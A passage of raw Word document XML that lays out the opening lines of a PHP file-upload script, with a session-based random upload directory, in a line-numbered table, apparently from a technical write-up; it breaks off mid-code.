          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B1CFB4E" wp14:editId="293DF1DB">
            <wp:extent cx="5731510" cy="827405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="618488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8974" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="827405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6402E80D" w14:textId="77777777" w:rsidR="007510EB" w:rsidRDefault="007510EB" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="754ECFAD" w14:textId="77777777" w:rsidR="002D75E5" w:rsidRDefault="002D75E5" w:rsidP="004F0B2A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7D92CC" w14:textId="1C33FE52" w:rsidR="002D75E5" w:rsidRPr="00FF23DE" w:rsidRDefault="002D75E5" w:rsidP="004F0B2A">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6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157571D5" w14:textId="77777777" w:rsidR="002D75E5" w:rsidRDefault="002D75E5" w:rsidP="004F0B2A">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11"/>
      </w:tblGrid>
      <w:tr w:rsidR="00361D31" w:rsidRPr="00361D31" w14:paraId="25BB87B5" w14:textId="77777777" w:rsidTr="00361D31">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F1C1F4D" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44E97AC1" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> 2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C171747" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> 3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CE4DE7A" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> 4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6337C66F" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> 5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DC4818A" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> 6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26AA7695" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> 7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7493F7E2" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> 8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B999D6C" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> 9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F39300B" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FF500EB" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05311902" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="479908D7" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54F4F2E6" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="541756BE" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E679429" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06ABBA45" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>17</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0515A696" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>18</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AA480D7" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>19</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03EF825D" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1668DD7D" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>21</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5005C4A0" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>22</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0854FB28" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F33D684" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>24</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42B96D81" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EAAC8C0" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>26</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E45440" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>27</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A8107AC" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>28</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="531024F4" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>29</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D668BD1" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:lastRenderedPageBreak/>
              <w:t>30</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="520EAF56" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>31</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18694AFD" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>32</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A6E9019" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>33</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E9ACDCD" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>34</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33D5E639" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>35</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FEDEDC0" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55C6BECF" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>37</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4492DFCB" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>38</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51A04B5B" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>39</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D77CF62" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>40</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="485B969A" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>41</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CAD6E07" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>42</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24630BD0" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>43</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06C8FB6A" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>44</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6761C49B" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>45</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2CC069DE" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>46</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CAA3147" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>47</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58316382" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>48</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="79C34FA9" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>49</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54D3F3A4" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>50</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6236AE1F" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>51</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66C2C967" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>52</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59B57512" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>53</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="215908A9" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>54</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FADFC0E" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>55</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00AB9BED" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>56</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="528989DF" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>57</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="017B0164" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t>58</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8566" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66F0FBF1" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>&lt;?php</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45FE499B" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="475AAAAE" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">    session_start();</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C52BA36" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> (!isset($_SESSION[</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'dir'</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>])) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CBEA421" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08AB38DE" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">        $_SESSION[</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'dir'</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">] = </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'/var/www/html/upload/'</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> . bin2hex(random_bytes(16));</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BB15CF0" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">    }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E47372E" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">    $dir = $_SESSION[</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>'dir'</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>];</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D1CD14E" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75965EE5" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> ( !file_exists($dir) )</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24C374EC" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">        mkdir($dir);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="796953C7" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="58BFF586" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>if</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>(isset($_FILES[</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"file"</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t>]) ) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="573AF5D0" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>try</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BF50821" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">          </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52458C1D" w14:textId="77777777" w:rsidR="00361D31" w:rsidRPr="00361D31" w:rsidRDefault="00361D31" w:rsidP="004F0B2A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00361D31">
              <w:t xml:space="preserve">          $file_name = $_FILES[</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>"file"</w:t>
            </w:r>
            <w:r w:rsidRPr="00361D31">
